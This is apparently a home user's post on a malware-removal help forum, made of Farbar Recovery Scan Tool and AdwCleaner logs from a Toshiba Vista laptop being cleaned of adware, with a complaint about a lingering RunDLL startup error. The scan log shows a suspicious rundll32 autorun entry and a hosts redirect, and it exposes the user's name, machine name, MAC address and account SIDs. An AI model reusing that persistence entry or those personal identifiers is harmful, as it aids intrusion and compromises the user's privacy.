==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80 FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80 FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80 FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869 FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900 FirewallRules: 
[{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Restore Points ========================= 09-09-2015 11:00:57 Windows Update 10-09-2015 18:07:18 Windows Update 15-09-2015 07:55:18 Windows Update 18-09-2015 17:16:42 Windows Update 22-09-2015 14:11:34 Windows Update 26-09-2015 09:52:55 Windows Update 30-09-2015 10:34:26 Windows Update 03-10-2015 14:53:55 Windows Update 07-10-2015 17:52:14 Windows Update 11-10-2015 19:12:09 Windows Update 14-10-2015 19:51:23 Windows Update 15-10-2015 09:28:46 Windows Update 19-10-2015 11:40:48 Windows Update 22-10-2015 17:02:18 Windows Update 29-10-2015 19:01:20 Windows Update 03-11-2015 10:52:06 Windows Update 08-11-2015 11:52:57 Windows Update 12-11-2015 20:50:58 Windows Update 12-11-2015 21:46:25 Windows Update 16-11-2015 15:08:37 Windows Update 20-11-2015 19:26:46 Windows Update 27-11-2015 19:04:56 Windows Update 01-12-2015 12:15:00 Windows Update 04-12-2015 15:03:04 Windows Update 11-12-2015 12:52:52 Windows Update 14-12-2015 12:24:39 Windows Update 17-12-2015 18:42:37 Windows Update 26-12-2015 11:41:26 Windows Update 29-12-2015 21:04:35 Windows Update 03-01-2016 21:07:54 Windows Update 08-01-2016 18:16:31 Windows Update 16-01-2016 08:03:26 Windows Update 17-01-2016 11:42:08 Windows Update 21-01-2016 12:58:31 Windows Update 23-01-2016 18:29:26 Removed Ask Toolbar. 
23-01-2016 18:35:35 Removed SlimCleaner Plus 29-01-2016 17:25:50 Removed Bing Bar 29-01-2016 17:45:18 Windows Update ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (01/30/2016 12:16:33 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/29/2016 05:31:49 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/29/2016 05:28:52 PM) (Source: EventSystem) (EventID: 4621) (User: ) Description: 80070005EventSystem.EventSubscription{60E12429-8258-44D3-B6B8-1E56EC5E24C3}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000} Error: (01/29/2016 05:11:25 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/27/2016 03:17:02 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/27/2016 03:06:33 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/26/2016 03:26:31 AM) (Source: EventSystem) (EventID: 4621) (User: ) Description: 80070005EventSystem.EventSubscription{6B3B7FCC-8870-4356-B799-369B66E9E2D1}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000} 
Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (01/30/2016 12:15:57 PM) (Source: Dhcp) (EventID: 1002) (User: ) Description: The IP address lease 10.0.0.10 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 192.168.1.254 (The DHCP Server sent a DHCPNACK message). Error: (01/29/2016 05:57:29 PM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/29/2016 05:38:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 115.31.0.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. 
New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:36:50 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY59 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\SYSTEM Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: ConfigFree Service%%1053 Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: 30000ConfigFree Service Error: (01/29/2016 05:28:52 PM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. 
Error: (01/29/2016 05:24:22 PM) (Source: Dhcp) (EventID: 1002) (User: ) Description: The IP address lease 10.236.153.51 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 10.0.0.1 (The DHCP Server sent a DHCPNACK message). CodeIntegrity: =================================== Date: 2016-01-30 12:35:59.759 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:59.556 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:59.228 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:58.885 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:58.495 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:58.230 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. 
Date: 2016-01-30 12:35:57.855 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:57.653 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:15.566 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:15.230 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz Percentage of memory in use: 43% Total physical RAM: 4093.04 MB Available physical RAM: 2331 MB Total Virtual: 8393.36 MB Available Virtual: 6361.18 MB ==================== Drives ================================ Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.62 GB) NTFS ==>[drive with boot components (obtained from BCD)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA) Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27) Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17) ==================== End of Addition.txt ============================
  4. The internet connection seems all fixed now. So that's good. However, on startup the PC always displays this error message:
     ------------------------------------------------------------------
     RunDLL
     Error loading\3\LXCYtime.dll
     The specified module could not be found
     -------------------------------------------------------------
     FYI, it was already doing this before you helped me, ever since the initial MB scan. Although I believe it might list different file names sometimes.
  5. # AdwCleaner v5.031 - Logfile created 27/01/2016 at 03:13:36 # Updated 25/01/2016 by Xplode # Database : 2016-01-25.3 [Local] # Operating system : Windows Vista Home Premium Service Pack 2 (x64) # Username : Barbara - BARBARA-PC # Running from : C:\Users\Barbara\Desktop\AdwCleaner.exe # Option : Cleaning # Support : http://toolslib.net/forum ***** [ Services ] ***** [-] Service Deleted : CouponPrinterService [-] Service Deleted : swdumon ***** [ Folders ] ***** [#] Folder Deleted : C:\Program Files\PC Optimizer Pro [#] Folder Deleted : C:\Program Files\WebBar [#] Folder Deleted : C:\Program Files (x86)\Coupons [#] Folder Deleted : C:\Program Files (x86)\driverupdate [#] Folder Deleted : C:\Program Files (x86)\OneSystemCare [#] Folder Deleted : C:\Program Files (x86)\Yahoo!\Companion [#] Folder Deleted : C:\ProgramData\CrimeWatch [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\driverupdate [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Optimizer Pro [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin [#] Folder Deleted : C:\Users\Barbara\AppData\Local\FinanceAlert [#] Folder Deleted : C:\Users\Barbara\AppData\Local\StormWatch [#] Folder Deleted : C:\Users\Barbara\AppData\Local\WebBar [#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo! 
Companion [#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo!\Companion [#] Folder Deleted : C:\Users\Barbara\AppData\Roaming\Yahoo!\Companion [#] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\iac ***** [ Files ] ***** [-] File Deleted : C:\Windows\SysNative\drivers\swdumon.sys [-] File Deleted : C:\Windows\SysWOW64\pmls.dll ***** [ DLLs ] ***** ***** [ Shortcuts ] ***** ***** [ Scheduled tasks ] ***** ***** [ Registry ] ***** [-] Key Deleted : HKCU\Software\BEFRUGAL [-] Key Deleted : HKCU\Software\DownloadAdmin [-] Key Deleted : HKCU\Software\SlimWare Utilities Inc [-] Key Deleted : HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key Deleted : HKLM\SOFTWARE\SlimWare Utilities Inc [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows5.0.1.6 [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{0BCE8B0A-1E76-44E5-9909-3CF804D92E4D}_is1 [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{79A765E1-C399-405B-85AF-466F52E918B0} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{eeb86aef-4a5d-4b75-9d74-f16d438fc286} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Coupon Printer for Windows5.0.1.6 [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\CrimeWatch [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\OneSystemCare [-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\AskToolbar [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\{9F6F6BFF-5270-44E3-8D40-0F2D89A64F42} [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\shopathome.com ***** [ Web browsers ] ***** [-] [C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\prefs.js] [Preference] Deleted : user_pref("plugin.state.npconduitfirefoxplugin", 0); ************************* :: "Tracing" keys removed :: Winsock settings cleared ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [11675 bytes] ##########
  6. Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016 Ran by Barbara (administrator) on BARBARA-PC (26-01-2016 03:06:09) Running from C:\Users\Barbara\Desktop Loaded Profiles: Barbara (Available Profiles: Barbara) Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States) Internet Explorer Version 9 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (AMD) C:\Windows\System32\atiesrxx.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (AMD) C:\Windows\System32\atieclxx.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Agere Systems) C:\Windows\System32\agr64svc.exe (TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe (TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe (Hewlett-Packard 
Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE (TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe (TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe (CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe (CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe (Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe (Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe (Coupons.com Inc.) 
C:\Program Files (x86)\Coupons\CouponPrinterService.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [] => [X] HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor) HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.) HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated) HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation) HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation) HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation) HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation) HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation) HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation) HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation) HKLM\...\Run: [LXCYCATS] 
=> "rundll32" \3\LXCYtime.dll,RunDLLEntry HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA) HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.) HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink) HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION) HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA) HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) 
Hosts: 0.0.0.1 mssplus.mcafee.com Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/ HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C} SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL = SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage} SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = SearchScopes: HKU\.DEFAULT -> {9F6F6BFF-5270-44E3-8D40-0F2D89A64F42} URL = 
hxxp://websearch.ask.com/redirect?client=ie&tb=WBR&o=13993&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=^W5&apn_dtid=^YYYYYY^YY^US&apn_uid=1C0E9576-C62B-4A47-ABAA-A8CAF89B7691&apn_sauid=BC87ED7E-5FF1-4904-A76C-FAE6DCFDD564 SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569 BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] () BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated) BHO-x32: Windows Live ID Sign-in Helper -> 